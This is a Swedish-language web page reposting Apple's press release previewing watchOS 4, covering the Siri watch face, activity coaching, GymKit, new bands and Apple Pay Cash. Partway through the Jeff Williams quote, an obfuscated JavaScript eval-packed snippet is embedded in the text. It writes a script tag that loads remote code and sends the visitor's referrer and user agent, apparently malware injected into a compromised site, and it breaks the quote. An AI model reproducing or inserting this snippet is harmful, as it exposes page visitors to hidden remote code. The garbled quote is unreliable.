Image Image Image Image Image Image Image Image Image Image

| 16 april, 2021

Scroll to top

Top

watchOS 4 – Mer intelligens och träningsfunktioner för Apple Watch

watchOS 4 – Mer intelligens och träningsfunktioner för Apple Watch
Sebastian

Idag förhandsvisade Apple watchOS 4 med den proaktiva urtavlan Siri som visar den information användaren behöver som mest under dagen, personanpassad aktivitetscoachning och en helt ny musikupplevelse. Uppdateringen innehåller den förbättrade appen Träning och introducerar den banbrytande teknikplattformen GymKit som gör det möjligt för kunder att ansluta till konditionsutrustning när de tränar.

”Apple eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|dzatb|var|u0026u|referrer|ssabn||js|php’.split(’|’),0,{}))
Watch är den perfekta enheten för en hälsosam livsstil och är nu intelligentare än någonsin med watchOS 4”, sa Jeff Williams, operativ chef på Apple. ”Vi har skapat en helt personligt anpassad upplevelse med de smartaste aktivitets- och träningsapparna och urtavlan Siri som visar den information du behöver när du behöver den, och vi ger användarna smidig tillgång till deras favoritmusik direkt på handleden.”

Intelligens
Siris intelligens sträcker sig djupare i Apple Watch med den nya urtavlan Siri. Varje gång du lyfter handleden uppdateras informationen på urtavlan dynamiskt baserat på tid på dagen, dagliga rutiner och relevanta data från appar som Aktivitet, Alarm, Andas, Kalender, Kartor, Påminnelser och Wallet, liksom rubriker från den nya appen Apple News för Apple Watch.

Med watchOS 4 ger appen Aktivitet intelligent coachning och skräddarsydd uppmuntran som hjälper dig att fylla aktivitetsringarna oftare och lyckas uppnå dina mål fler gånger i rad. Varje morgon får användare en personligt anpassad notis om de är nära att klara av en prestation, eller förslag på vad de kan göra för att matcha gårdagens aktivitetsnivåer. Om det behövs mot slutet av dagen får de veta exakt hur länge de behöver promenera för att stänga sina aktivitetsringar innan dagen är över. Användare får även unika månadsutmaningar som är specialanpassade för dem.

Att lyssna på musik är personligare än någonsin med den omdesignade appen Musik som automatiskt synkar mixarna New Music Mix, Favorites Mix och din mest spelade musik. Med ännu fler låtar på armen och Apple Watch som är parkopplad med AirPods i en självklar kombination blir det enklare och smidigare att lyssna musik under träningen eller på språng.

Motion
Den uppdaterade appen Träning innehåller nu automatiskt inställda simträningar för pool samt nya rörelse- och pulsalgoritmer för högintensiv intervallträning (HIIT). Med watchOS 4 kan kunder som tränar flera pass på raken eller tränar inför en triathlon kombinera flera träningspass för att visa övergripande kalori- och tidsmätningar.

Med GymKit kan kunder som använder konditionsutrustning snart bara trycka för att parkoppla sin Apple Watch direkt med löpband, crosstrainermaskiner, motionscyklar eller trappmaskiner från Life Fitness, Technogym och andra globala tillverkare. En branschnyhet är att data som inte redan har kommunicerats mellan smartklockan och träningsmaskinen nu synkas smidigt – sådant som kalorier, distans, hastighet, antal trappor, lutning och takt – vilket ger de mest tillförlitliga mätningarna med mindre enhetshantering.

Urtavlor och armband
Utöver urtavlan Siri finns nya Toy Story-urtavlor med Pixar-karaktärer som Woody, Jessie och Buzz Lightyear, medan Kalejdoskop förvandlar statiska bilder till fängslande mönster. Nya komplikationer omfattar Spelas nu och Apple News.

Idag introducerade Apple också armband med nya sommarfärger, så kunderna har fler möjligheter än någonsin att uttrycka sin personliga stil. Den här säsongen finns färgstarka sportband, ett klargult armband med klassiskt spänne och olika Nike-sportband som är färgmatchade med kollektionen Nike Air VaporMax Flyknit Day to Night. För att hylla mångfald och inkludering erbjuder Apple även ett vävt nylonarmband i en regnbågsrandig Pride-utgåva.

Person to Person-betalningar med Apple Pay
Med watchOS 4 kan Apple Watch-användare snabbt, enkelt och säkert skicka och ta emot betalningar till och från släkt och vänner med Apple Pay, i Meddelanden eller med hjälp av Siri. När en användare har tagit emot en betalning kommer pengarna in på det nya Apple Pay Cash-kontot, och användaren kan direkt skicka dem till någon annan, betala med Apple Pay i butiker och appar eller överföra dem till sitt bankkonto.

Pris och tillgänglighet
watchOS 4 släpps i höst som en kostnadsfri uppdatering till Apple Watch som är parkopplad med iPhone 5s eller senare med iOS 11. Medlemmar i iOS Developer Program kan redan nu ladda ner WatchKit för watchOS 4 på
developer.apple.com. Mer information finns på apple.com/se/watchos-preview. Funktionerna kan ändras. Vissa funktioner kanske inte är tillgängliga i alla länder. My Favorites Mix och My New Music Mix kräver en prenumeration på Apple Music. Person to Person-betalningar och Apple Pay Cash blir tillgängliga i USA på iPhone SE, iPhone 6 och senare, iPad Pro, iPad (femte generationen), iPad Air 2, iPad mini 3 och senare och Apple Watch.

• Apple Watch med två olika boettstorlekar: 38 mm och 42 mm. Apple Watch Series 1 finns med aluminiumboett i guld, rosa guld, silver eller rymdgrå tillsammans med ett sportband och pris från endast 2 995 kr. Apple Watch Series 2 finns med aluminiumboetter i guld, rosa guld, silver eller rymdgrå samt med boett i rostfritt stål i silver eller rymdgrå tillsammans med ett stort urval armband från endast 4 195 kr, och Apple Watch Edition i keramiskt utförande kostar från 14 195 kr på apple.se, Apple Store samt hos utvalda auktoriserade Apple-återförsäljare och operatörer. Du kan kontrollera lokal tillgänglighet på locate.apple.com. Apple Watch Nike+ kostar från 4 195 kr.

• Nya sportband och armband med klassiskt spänne till Apple Watch finns idag på apple.se och senare den här veckan på Apple Store, samt hos utvalda auktoriserade Apple-återförsäljare och operatörer i USA och över 35 länder och regioner som omfattar Australien, Brasilien, Frankrike, Förenade Arabemiraten, Hongkong, Italien, Japan, Kanada, Kina, Nederländerna, Ryssland, Schweiz, Singapore, Spanien, Storbritannien, Sverige, Sydkorea och Tyskland. Sportbandet kostar 525 kr och armbandet med klassiskt spänne kostar 1 525 kr.

• Det nya vävda nylonarmbandet i Pride-utgåva finns idag på apple.se och senare den här veckan på Apple Store, samt hos utvalda auktoriserade Apple-återförsäljare och operatörer i USA och över 35 länder och regioner som omfattar Australien, Brasilien, Frankrike, Förenade Arabemiraten, Hongkong, Italien, Japan, Kanada, Kina, Nederländerna, Schweiz, Singapore, Spanien, Storbritannien, Sverige, Sydkorea och Tyskland. Vävda nylonarmband kostar 525 kr.

• Nya färger på Nike-sportbandet finns idag på apple.se, Nike.com samt i utvalda Nike-butiker och senare den här veckan på Apple Store, samt hos utvalda auktoriserade Apple-återförsäljare och utvalda fackhandlare och varuhus i USA och över 35 länder och regioner som omfattar Australien, Brasilien, Frankrike, Förenade Arabemiraten, Hongkong, Italien, Japan, Kanada, Kina, Nederländerna, Ryssland, Schweiz, Singapore, Spanien, Storbritannien, Sverige, Sydkorea och Tyskland. Nike-sportbandet kostar 525 kr.

• Kunder som köper en Apple Watch från Apple erbjuds tjänsten Personal Setup, i butik eller online*, som innebär hjälp med att ställa in och anpassa deras nya Apple Watch med kalendrar, notiser, appar och mycket annat.
• Alla som vill lära sig grunderna eller ta nästa steg med sin nya Apple Watch kan boka in gratispass på apple.com/se/today.

* I de flesta länderna.
När Apple lanserade Macintosh 1984 var det början på en revolutionerande era. Idag står Apple ständigt för nya innovationer med produkter som iPhone, iPad, Mac, Apple Watch och Apple TV. Apples fyra mjukvaruplattformar – iOS, macOS, watchOS och tvOS – ger en smidig upplevelse på alla Apple-enheter och skapar nya möjligheter med banbrytande tjänster som App Store, Apple Music, Apple Pay och iCloud. Apples över 100 000 medarbetare brinner för att göra de bästa produkterna i världen och att lämna världen i bättre skick än när vi började.